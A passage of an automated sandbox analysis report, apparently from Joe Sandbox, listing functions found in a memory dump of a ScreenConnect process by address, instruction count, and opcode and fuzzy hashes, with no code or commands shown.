7ffd9b600368-7ffd9b600376 1845->1853 1854 7ffd9b600364-7ffd9b600366 1845->1854 1852 7ffd9b600479-7ffd9b600496 1850->1852 1851->1852 1860 7ffd9b60049c-7ffd9b6004aa 1852->1860 1861 7ffd9b600498-7ffd9b60049a 1852->1861 1856 7ffd9b600379-7ffd9b60038f 1853->1856 1854->1856 1862 7ffd9b6003a6-7ffd9b6003ad 1856->1862 1863 7ffd9b600391-7ffd9b6003a4 1856->1863 1864 7ffd9b6004ad-7ffd9b6004b6 1860->1864 1861->1864 1867 7ffd9b6003b4-7ffd9b6003c7 1862->1867 1863->1862 1868 7ffd9b6003cd-7ffd9b6003d0 1863->1868 1864->1794 1867->1868 1869 7ffd9b6003e7-7ffd9b6003fa 1868->1869 1870 7ffd9b6003d2-7ffd9b6003e5 1868->1870 1869->1803 1870->1803 1870->1869
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: cbff991d67b26e9acf34a15e1ba883e53861684f911232a81701862ac28243a1
                                                                                                                                                                      • Instruction ID: 173957a6b8ae85d3852c078a33fee7bc2e3c58cacf9adc2d964bcddcc2229508
                                                                                                                                                                      • Opcode Fuzzy Hash: cbff991d67b26e9acf34a15e1ba883e53861684f911232a81701862ac28243a1
                                                                                                                                                                      • Instruction Fuzzy Hash: EA120571B0EA4E4FE7AAD6AE84756B53BD1EF5A700F0600BAD49DCB1A3DD18BD418340
                                                                                                                                                                      Function 00007FFD9B6097ED Relevance: .5, Instructions: 479COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 96aeb8f43a33f815c286317cf12cfe59badb2dc9be8559a3595dd9e3c406b8b4
                                                                                                                                                                      • Instruction ID: 9abf4a5c43b42daca9e4c911c33f19598de978398ffcac2d7f0098b11b90c12a
                                                                                                                                                                      • Opcode Fuzzy Hash: 96aeb8f43a33f815c286317cf12cfe59badb2dc9be8559a3595dd9e3c406b8b4
                                                                                                                                                                      • Instruction Fuzzy Hash: 94F10971B0EA4E4FEBA4DE6E88686A437D2EF96340F0900B9D06CC72E7DD25BD418741
                                                                                                                                                                      Function 00007FFD9B605C09 Relevance: .4, Instructions: 410COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: b26e361ac30e7cae673bbb66e7385a7ffd9d0b6e3aace5a53857881945c35cf3
                                                                                                                                                                      • Instruction ID: f8e0e0755056bed8374059e0ee5cf3360510fda5bf599303f63139ee2c47ea42
                                                                                                                                                                      • Opcode Fuzzy Hash: b26e361ac30e7cae673bbb66e7385a7ffd9d0b6e3aace5a53857881945c35cf3
                                                                                                                                                                      • Instruction Fuzzy Hash: 1BC15B32B0EA4E0FEB69EE1A84A18B433D1EF66350704017ED49ECB5E2ED15B9468780
                                                                                                                                                                      Function 00007FFD9B6007F2 Relevance: .4, Instructions: 401COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 72e51a8ab245699cb02c5f90f8acc2436620c5bbc1767ad5790e8b41ce2067b4
                                                                                                                                                                      • Instruction ID: 58ed066fd725c8f4c0a671f9430db9e1f4d6b7e69c4ce1a75bdb2da64b973d42
                                                                                                                                                                      • Opcode Fuzzy Hash: 72e51a8ab245699cb02c5f90f8acc2436620c5bbc1767ad5790e8b41ce2067b4
                                                                                                                                                                      • Instruction Fuzzy Hash: 23D1ED35709B098FDF98EE5EC0A0AA173E1FF55714B6509A9D069CF29BCA25F843CB40
                                                                                                                                                                      Function 00007FFD9B6056FD Relevance: .3, Instructions: 323COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: bbaa9f21d770547c6a3531d32f593912a4e736ffcbf55253c77da416d2e9f4e3
                                                                                                                                                                      • Instruction ID: d2a3ceb89d4b4c2c45487e95813409026e1a850ccb7e0bc5f4c6f0f36539ab62
                                                                                                                                                                      • Opcode Fuzzy Hash: bbaa9f21d770547c6a3531d32f593912a4e736ffcbf55253c77da416d2e9f4e3
                                                                                                                                                                      • Instruction Fuzzy Hash: F3B19E34709B098FDBDCEE59C4A5A6173E2FF65304B6509ADD069CF29ACA25F842CB40
                                                                                                                                                                      Function 00007FFD9B607E67 Relevance: .2, Instructions: 236COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: aec42af2a2e24524ec824c4bdd90b8e9aa168355e8af106ee0bad01b9142650f
                                                                                                                                                                      • Instruction ID: 454ecbe33ae632a47642650e90219e7d5b96d433599508ad65094622d5c8cafc
                                                                                                                                                                      • Opcode Fuzzy Hash: aec42af2a2e24524ec824c4bdd90b8e9aa168355e8af106ee0bad01b9142650f
                                                                                                                                                                      • Instruction Fuzzy Hash: 1771CB31B1B90F4AFB75E7A780716BD62D2EF95340F524079D4AECB2E1DD2C7A428241
                                                                                                                                                                      Function 00007FFD9B60B7CA Relevance: .2, Instructions: 213COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 05dfe4bb4bbca785063a73f3cc6f5ac97fdce8e7ebea56cd1405bc6c4cb19b37
                                                                                                                                                                      • Instruction ID: 714be41de2dcb08ecb55ffc486e37c07f127c5fe7c6a285d4050a7bc33cac764
                                                                                                                                                                      • Opcode Fuzzy Hash: 05dfe4bb4bbca785063a73f3cc6f5ac97fdce8e7ebea56cd1405bc6c4cb19b37
                                                                                                                                                                      • Instruction Fuzzy Hash: 53619220B1990E8FEBA8EF6D8465B7973D2EF98700F1941B5E01DC72ABCD28BD418741
                                                                                                                                                                      Function 00007FFD9B603ED8 Relevance: .2, Instructions: 203COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 330e35029d07f1138885abc851e4433eae0c6fdb64f5de034e3b32da17283d23
                                                                                                                                                                      • Instruction ID: 6056538b60763b82994fa9ead36515c1b297354a7a6fe736aaeaec4beca9242e
                                                                                                                                                                      • Opcode Fuzzy Hash: 330e35029d07f1138885abc851e4433eae0c6fdb64f5de034e3b32da17283d23
                                                                                                                                                                      • Instruction Fuzzy Hash: 2E61343570DA498FDBECEF59C0A566177A2FF69304B2405ADC06DCF29ACA25F942C740
                                                                                                                                                                      Function 00007FFD9B60CDD7 Relevance: .2, Instructions: 200COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 5b95482bc78bb510e64ba6f9b56d141a5279fe8b3c12b71beb83ffbb1ec470f3
                                                                                                                                                                      • Instruction ID: 3a118733c95bcec9d37beb976d80e8797fb50f39f5f90d1b199dcb8ad3a6ac09
                                                                                                                                                                      • Opcode Fuzzy Hash: 5b95482bc78bb510e64ba6f9b56d141a5279fe8b3c12b71beb83ffbb1ec470f3
                                                                                                                                                                      • Instruction Fuzzy Hash: 6B51AA42B0EA4E0FE7A4BE6E18759F53BD1EF96250B5400BBD05CCB1EBDC18BD464241
                                                                                                                                                                      Function 00007FFD9B60276E Relevance: .2, Instructions: 181COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: ea28bf07badfe79da4158a0c0a18201cc4ef59d4fb5956324fc235d6cf5913f6
                                                                                                                                                                      • Instruction ID: a5d426f35d4160426b1302f1243e462ac3c2d38bd0a8701eacfa864b355b6b42
                                                                                                                                                                      • Opcode Fuzzy Hash: ea28bf07badfe79da4158a0c0a18201cc4ef59d4fb5956324fc235d6cf5913f6
                                                                                                                                                                      • Instruction Fuzzy Hash: C2510872B0DA494FDF98DE6A8861AA173D1FF65310F0500A9D49DCB2A6DE25FC05CB80
                                                                                                                                                                      Function 00007FFD9B60CE43 Relevance: .2, Instructions: 168COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 8e4805a494d271e1fc851ecceeb00544ef4c2d49097eecd69a5e8e34ea46530d
                                                                                                                                                                      • Instruction ID: de805f96465de539bd337c68253c05dca06805ce8c8cc05c4e3d0f32923a18b0
                                                                                                                                                                      • Opcode Fuzzy Hash: 8e4805a494d271e1fc851ecceeb00544ef4c2d49097eecd69a5e8e34ea46530d
                                                                                                                                                                      • Instruction Fuzzy Hash: E3416A42B1DE4E0FEBA4EE6E08B59B577D2EFA5290B54007AD05CC72EBDC18BD424341
                                                                                                                                                                      Function 00007FFD9B60CE4A Relevance: .2, Instructions: 166COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: bbb28e3317e7baa776385f23f1fd599e2704a2ef201bd1c4330253ad8dcf40fa
                                                                                                                                                                      • Instruction ID: ddae715a0dd8f8e6a3f46dae8af3141b424c5ed106ffc4711d0a94800188395b
                                                                                                                                                                      • Opcode Fuzzy Hash: bbb28e3317e7baa776385f23f1fd599e2704a2ef201bd1c4330253ad8dcf40fa
                                                                                                                                                                      • Instruction Fuzzy Hash: 34416A42B1D94E0FEBA4EE6E08755B577D1EFA5290B5400BAD45CC72DBDC18BD424342
                                                                                                                                                                      Function 00007FFD9B60DED4 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 1bfecbff3c9bfdb14fd7b380423800d4168fec4e75a74b2dbf8aaf8ec39c473e
                                                                                                                                                                      • Instruction ID: 4418504a1d0976f6ee24afe542f6e48354312578f4e5b3df0801cd5b9c226b92
                                                                                                                                                                      • Opcode Fuzzy Hash: 1bfecbff3c9bfdb14fd7b380423800d4168fec4e75a74b2dbf8aaf8ec39c473e
                                                                                                                                                                      • Instruction Fuzzy Hash: 05510A31E0964E4FEBA4EB6A846A7A437E1EF5A300F0141B9D49DD72F2DD28B9448740
                                                                                                                                                                      Function 00007FFD9B606629 Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 94b95bdaf832e12c388f0af86a9625dfcd599bd9c60a859c0efec4f6ba6989d3
                                                                                                                                                                      • Instruction ID: e848867163330f6b1e9cb2a3e490a3c00786399e9d24c27c39a704bd42ef1e3e
                                                                                                                                                                      • Opcode Fuzzy Hash: 94b95bdaf832e12c388f0af86a9625dfcd599bd9c60a859c0efec4f6ba6989d3
                                                                                                                                                                      • Instruction Fuzzy Hash: D941A671709A4D8FDB94CF19C8A4A653BA1FF59314B1501ADE46DCB2E2CB35E852CB01
                                                                                                                                                                      Function 00007FFD9B60C215 Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 7a8f98bf1a0b7ba76fb1de58de1e7214d639edc272915650ccbe65ccd2bc45a8
                                                                                                                                                                      • Instruction ID: a01b7f2edd47cb5fc089933f66f9870dd5bd8c8fa4d90237d9d00abd6d0b6965
                                                                                                                                                                      • Opcode Fuzzy Hash: 7a8f98bf1a0b7ba76fb1de58de1e7214d639edc272915650ccbe65ccd2bc45a8
                                                                                                                                                                      • Instruction Fuzzy Hash: CB312731B19A0E4FE794FB6D98A457873D1FB95360B54017BC41DC72AADD24FD828381
                                                                                                                                                                      Function 00007FFD9B606CE4 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 0e530f8b5909f0d100afa5a5f51a34de00f1e8e3a78e01decd3f7b8cd1355b5e
                                                                                                                                                                      • Instruction ID: 91256b067b063bbe42935abf6e4d3ca752f3603b47a0d3de56e1fb26c11c7422
                                                                                                                                                                      • Opcode Fuzzy Hash: 0e530f8b5909f0d100afa5a5f51a34de00f1e8e3a78e01decd3f7b8cd1355b5e
                                                                                                                                                                      • Instruction Fuzzy Hash: 34411761B0E68A4FEB579B6948B01B47F92EF47344F0901BAD0ECCB1EBDD196806C341
                                                                                                                                                                      Function 00007FFD9B6012F3 Relevance: .1, Instructions: 123COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 8695b4277dd133d1237b2967774ec6b027d795c96b94f291fe386e46538d6354
                                                                                                                                                                      • Instruction ID: 169026b19c63bdc03ec644d85fc99da88fcf19161289696e3927f3703a9b4682
                                                                                                                                                                      • Opcode Fuzzy Hash: 8695b4277dd133d1237b2967774ec6b027d795c96b94f291fe386e46538d6354
                                                                                                                                                                      • Instruction Fuzzy Hash: B541D57390F7964FD722AABE98614D53FA0EF1331870901F7D0D98F0A3E91A79468781
                                                                                                                                                                      Function 00007FFD9B604471 Relevance: .1, Instructions: 117COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: b12034b5cabfed8aa0e72d7eb1d5c287d3c3f5df9de815c3b1ed401a16090973
                                                                                                                                                                      • Instruction ID: b73d558db9eeaa9b76eb078683fea5b8829f95c6a8d15a90d1f3b4af5170c15c
                                                                                                                                                                      • Opcode Fuzzy Hash: b12034b5cabfed8aa0e72d7eb1d5c287d3c3f5df9de815c3b1ed401a16090973
                                                                                                                                                                      • Instruction Fuzzy Hash: A6218D63A4F7C91FD3A686AA18355B03FB0EF5721170A01FBE498CB1A3D95DAD0A8351
                                                                                                                                                                      Function 00007FFD9B6005F9 Relevance: .1, Instructions: 114COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: bb50b4b296c6ce572a0810c9b26989bbae82078488757ee1908c307c21824a23
                                                                                                                                                                      • Instruction ID: 08f9d01ce96303f0d265930fc5934d4d617c258704a0410478cf1ccf9cc9d67d
                                                                                                                                                                      • Opcode Fuzzy Hash: bb50b4b296c6ce572a0810c9b26989bbae82078488757ee1908c307c21824a23
                                                                                                                                                                      • Instruction Fuzzy Hash: 11319370B09A4E8FDB94EF18C460AA977A2FF99314B5101B9D06DCB2D6CB35EC52CB40
                                                                                                                                                                      Function 00007FFD9B60E228 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: b4dece0e4a68d25b97e8add01a1e0f52a07a0546b3577b16f56616e832db6d96
                                                                                                                                                                      • Instruction ID: 367baaca5856b8282ddc200ffa3d306785ee4108dfbe051ff3538aca9ea703e8
                                                                                                                                                                      • Opcode Fuzzy Hash: b4dece0e4a68d25b97e8add01a1e0f52a07a0546b3577b16f56616e832db6d96
                                                                                                                                                                      • Instruction Fuzzy Hash: 5D31D170A0961C8FEB58EF98C85ABEDBBF0FB59310F00426ED04DD7251CA706845CB81
                                                                                                                                                                      Function 00007FFD9B60DFAB Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 2f89855a608f774f7172c9415feef0e4e4795830cb2d467515ee61a37d1e4967
                                                                                                                                                                      • Instruction ID: 92b416b33919f16f488dd7f64e3f5aae9ba0d5ff5582e6b1cb1afde49a46a245
                                                                                                                                                                      • Opcode Fuzzy Hash: 2f89855a608f774f7172c9415feef0e4e4795830cb2d467515ee61a37d1e4967
                                                                                                                                                                      • Instruction Fuzzy Hash: 1F319E70A0591C8FEBE4EF59C4A97A477E1EF69300F4140B9D45DDB2A2DE34BD808B40
                                                                                                                                                                      Function 00007FFD9B600610 Relevance: .1, Instructions: 93COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 708ce7b688ae6f2b7b89bbd56da224a1938549f173d97b6a50394bd89fd8101d
                                                                                                                                                                      • Instruction ID: 52afa2d878a9f915d2610569fe518370e7a0cff98268f71eabd5a20da16df4fb
                                                                                                                                                                      • Opcode Fuzzy Hash: 708ce7b688ae6f2b7b89bbd56da224a1938549f173d97b6a50394bd89fd8101d
                                                                                                                                                                      • Instruction Fuzzy Hash: D2312C70B19A0E8FDB98EF19C4A0AA973E2FF99304B500179D02DC7295CB35ED52CB80
                                                                                                                                                                      Function 00007FFD9B60C9AA Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: a7200b0a74ffe5037345e00582c8583d061c3a603dd0602d7860d238e28a411a
                                                                                                                                                                      • Instruction ID: 1b547a88b58362f0a25c040ffb0c4fd0103f73735e5156ed148dda9a129a58b3
                                                                                                                                                                      • Opcode Fuzzy Hash: a7200b0a74ffe5037345e00582c8583d061c3a603dd0602d7860d238e28a411a
                                                                                                                                                                      • Instruction Fuzzy Hash: 1D21F621B1AE4D4FE7A5FB7D48696357BE2FF9A24170500BAD04DC72A7ED18B8058340
                                                                                                                                                                      Function 00007FFD9B6059F5 Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 78568a897d6808f1ec4a4f8d78ee97bed898802b52abc559e12c1e62c4185afd
                                                                                                                                                                      • Instruction ID: 578a67ec103b21f6e3c77761a13fdabe44dd47567d433d97b38bc2e0f273ffd0
                                                                                                                                                                      • Opcode Fuzzy Hash: 78568a897d6808f1ec4a4f8d78ee97bed898802b52abc559e12c1e62c4185afd
                                                                                                                                                                      • Instruction Fuzzy Hash: 13210422B1E54E0AF37426FB68F12F457C1DB86325F4601B7E498CA1E3E90D2EC14380
                                                                                                                                                                      Function 00007FFD9B60DF85 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: e2ecba9e07973339d8cd95351b776660fa6a2caf569af03e3abe9943fecffbc1
                                                                                                                                                                      • Instruction ID: d76a3b07fde2ca8540940ec3588c14f95fbb1a2fd36787283bd068b4848906bc
                                                                                                                                                                      • Opcode Fuzzy Hash: e2ecba9e07973339d8cd95351b776660fa6a2caf569af03e3abe9943fecffbc1
